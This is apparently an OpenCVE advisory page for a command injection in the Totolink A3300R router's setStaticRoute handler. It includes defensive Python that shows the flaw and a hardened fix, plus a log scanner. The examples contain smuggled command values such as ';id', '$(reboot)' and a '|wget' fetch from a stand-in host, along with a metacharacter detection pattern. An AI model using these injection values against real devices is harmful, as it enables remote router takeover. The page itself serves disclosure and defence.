Description
A security vulnerability has been detected in Totolink A3300R 17.0.0cu.557_b20221024. Impacted is the function setStaticRoute of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument ip leads to command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.
Published: 2026-03-30
Score: 5.3 Medium
EPSS: 2.9% Low
KEV: No
Impact: Command Injection
Action: Immediate Patch
AI Analysis

Impact

The setStaticRoute handler in /cgi-bin/cstecgi.cgi does not properly sanitize the ip argument before using it. A crafted value is passed through to a shell, so the router executes arbitrary commands supplied by the attacker. The result is remote command execution on the router, which can lead to full compromise of the device.
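As an added illustration (not the vendor's code and not taken from the published exploit), the following Python models the vulnerable pattern behind this class of flaw beside a hardened handler. The command template, the argument names netmask and gw, and the payload values are assumptions made for the example; only the ip argument and the setStaticRoute handler are named by the advisory. Instead of executing anything, it tokenises the built command line the way a POSIX shell would, so you can see the second command appear.

```python
import ipaddress
import shlex

# Constructed values for the example. BENIGN_IP is a normal network address;
# MALICIOUS_IP appends a shell separator and a second command to it.
BENIGN_IP = "192.168.1.0"
MALICIOUS_IP = "192.168.1.0;id"


def build_route_cmd_vulnerable(ip: str, netmask: str, gateway: str) -> str:
    """Hypothetical vulnerable pattern: request arguments are concatenated into
    a command line that the handler would later hand to system()/popen().
    Nothing is executed here; the string is returned for inspection."""
    return f"route add -net {ip} netmask {netmask} gw {gateway}"


def simulate_shell(cmdline: str) -> list[list[str]]:
    """Tokenise a command line the way a POSIX shell would (shlex with
    punctuation_chars=True emits ';' as its own token) and split it into the
    separate commands the shell would run, without running any of them."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands: list[list[str]] = []
    current: list[str] = []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def validate_ipv4(value: str) -> bool:
    """Accept only a strict dotted-quad IPv4 literal. Separators, whitespace,
    quotes and every other shell metacharacter fail this grammar, so a
    positive allow-list check is enough; no deny-list of bad characters needed."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def build_route_cmd_hardened(ip: str, netmask: str, gateway: str) -> list[str]:
    """Hardened form: validate each argument against the IPv4 grammar, then
    build an argv list for execve()/subprocess.run(argv) so no shell ever
    parses attacker-controlled bytes."""
    for name, value in (("ip", ip), ("netmask", netmask), ("gw", gateway)):
        if not validate_ipv4(value):
            raise ValueError(f"argument {name!r} is not an IPv4 literal: {value!r}")
    return ["route", "add", "-net", ip, "netmask", netmask, "gw", gateway]


def hardened_rejects(ip: str, netmask: str, gateway: str) -> bool:
    """True if the hardened builder refuses the arguments."""
    try:
        build_route_cmd_hardened(ip, netmask, gateway)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for ip in (BENIGN_IP, MALICIOUS_IP):
        cmd = build_route_cmd_vulnerable(ip, "255.255.255.0", "192.168.1.1")
        programs = [c[0] for c in simulate_shell(cmd)]
        print(f"{ip!r:22} -> shell would run {len(programs)} command(s): {programs}")
        print(f"{'':22}    hardened rejects: {hardened_rejects(ip, '255.255.255.0', '192.168.1.1')}")
```

The point of the hardened form is that it does not try to strip or escape dangerous characters; it accepts only values that match the expected grammar and then avoids the shell altogether, which closes the whole class of injection rather than one payload.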

Affected Systems

Totolink A3300R routers running firmware version 17.0.0cu.557_b20221024 are affected. The flaw is in the cstecgi.cgi script of the web management interface.

Risk and Exploitability

The CVSS v4.0 score of 5.3 indicates medium severity (the v3.x vectors score it 6.3 and v2 scores it 6.5), and the EPSS score is 2.9%. The vulnerability is not listed in the CISA KEV catalog, but a public exploit exists and the flaw can be triggered remotely by sending a crafted HTTP request to the cstecgi.cgi endpoint. Every published vector carries PR:L (Au:S in v2), so exploitation needs a low-privileged authenticated session on the web interface in addition to network reachability; in practice the risk is governed by whether the management interface is exposed beyond the LAN and how strong its credentials are. Given the public exploit, the risk is significant for exposed devices.

Generated by OpenCVE AI on March 30, 2026 at 05:50 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the router firmware to a version that resolves the command injection flaw, if one is available on the manufacturer's site.
  • If no patch exists, block remote access to the /cgi-bin/cstecgi.cgi endpoint or the entire web management interface using firewall or ACL rules.
  • Continuously monitor system logs for attempts to invoke cstecgi.cgi or evidence of unexpected command execution.

Generated by OpenCVE AI on March 30, 2026 at 05:50 UTC.
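The log-monitoring action above is easiest to operationalise with a small scanner. The following Python is an added example, not OpenCVE's or Totolink's tooling. It assumes a JSON-lines log (constructed here) in which a reverse proxy or custom logger in front of the web UI records the source address, request path and decoded request parameters; it assumes the management network is 192.168.1.0/24; and it assumes the handler takes netmask and gw arguments alongside the ip argument named in the advisory. It flags two things independently: requests to the endpoint from outside the management network, and parameter values carrying shell metacharacters, so an authenticated attacker on the LAN (which is what PR:L allows) is still caught.

```python
import ipaddress
import json
import re

# The endpoint named in the advisory.
ENDPOINT = "/cgi-bin/cstecgi.cgi"
# Assumed management network; anything else reaching the admin UI is suspicious.
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.0/24")]
# Shell metacharacters that have no business in a route parameter.
SHELL_META = re.compile(r"""[;&|`$(){}<>\n\\'"]""")

# Constructed sample log in an assumed JSON-lines format: each record carries the
# source address, request path and the decoded request parameters.
SAMPLE_LOG = """\
{"ts": "2026-03-30T05:50:01Z", "src": "192.168.1.50", "path": "/cgi-bin/cstecgi.cgi", "params": {"action": "setStaticRoute", "ip": "10.0.0.0", "netmask": "255.0.0.0", "gw": "192.168.1.1"}}
{"ts": "2026-03-30T05:50:07Z", "src": "203.0.113.9", "path": "/cgi-bin/cstecgi.cgi", "params": {"action": "setStaticRoute", "ip": "10.0.0.0;id", "netmask": "255.0.0.0", "gw": "192.168.1.1"}}
{"ts": "2026-03-30T05:50:09Z", "src": "192.168.1.50", "path": "/index.html", "params": {}}
{"ts": "2026-03-30T05:50:12Z", "src": "203.0.113.9", "path": "/cgi-bin/cstecgi.cgi", "params": {"action": "setStaticRoute", "ip": "10.0.0.0", "netmask": "255.0.0.0", "gw": "$(reboot)"}}
{"ts": "2026-03-30T05:50:15Z", "src": "192.168.1.77", "path": "/cgi-bin/cstecgi.cgi", "params": {"action": "setStaticRoute", "ip": "10.0.0.0|wget http://203.0.113.9/x", "netmask": "255.0.0.0", "gw": "192.168.1.1"}}
"""


def analyse_record(rec: dict) -> list[str]:
    """Return the findings for one log record (empty list = nothing notable)."""
    findings: list[str] = []
    if rec.get("path") != ENDPOINT:
        return findings
    src = ipaddress.ip_address(rec["src"])
    if not any(src in net for net in TRUSTED_NETS):
        findings.append("untrusted_source")
    for name, value in rec.get("params", {}).items():
        if SHELL_META.search(str(value)):
            findings.append(f"shell_metachar:{name}")
    return findings


def scan_log(text: str) -> list[dict]:
    """Parse a JSON-lines log and return only the records that produced
    findings, each annotated with its findings list."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        findings = analyse_record(rec)
        if findings:
            alerts.append({"ts": rec["ts"], "src": rec["src"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['src']:15} {', '.join(alert['findings'])}")
```

Run against the constructed log this reports three of the five records: the two WAN-side requests (one with an injected ip, one with an injected gw) and the LAN-side request whose ip value smuggles a pipe. The benign LAN-side route change and the unrelated page fetch produce nothing.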

Advisories

No advisories yet.

History

Mon, 30 Mar 2026 15:45:00 +0000

CPEs:
  cpe:2.3:h:totolink:a3300r:-:*:*:*:*:*:*:*
  cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:*

Mon, 30 Mar 2026 07:15:00 +0000

First Time appeared: Totolink a3300r
Vendors & Products: Totolink a3300r

Mon, 30 Mar 2026 03:30:00 +0000

Description: A security vulnerability has been detected in Totolink A3300R 17.0.0cu.557_b20221024. Impacted is the function setStaticRoute of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument ip leads to command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.
Title: Totolink A3300R cstecgi.cgi setStaticRoute command injection
First Time appeared: Totolink; Totolink a3300r Firmware
Weaknesses: CWE-74; CWE-77
CPEs: cpe:2.3:o:totolink:a3300r_firmware:*:*:*:*:*:*:*:*
Vendors & Products: Totolink; Totolink a3300r Firmware
References:
Metrics:
  cvssV2_0: {'score': 6.5, 'vector': 'AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR'}
  cvssV3_0: {'score': 6.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}
  cvssV3_1: {'score': 6.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}
  cvssV4_0: {'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P'}

MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-03-30T02:00:15.646Z

Reserved: 2026-03-29T17:50:53.126Z

Link: CVE-2026-5104

Vulnrichment

No data.

NVD

Status : Analyzed

Published: 2026-03-30T03:15:58.187

Modified: 2026-03-30T15:41:52.153

Link: CVE-2026-5104

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-30T07:03:44Z

Weaknesses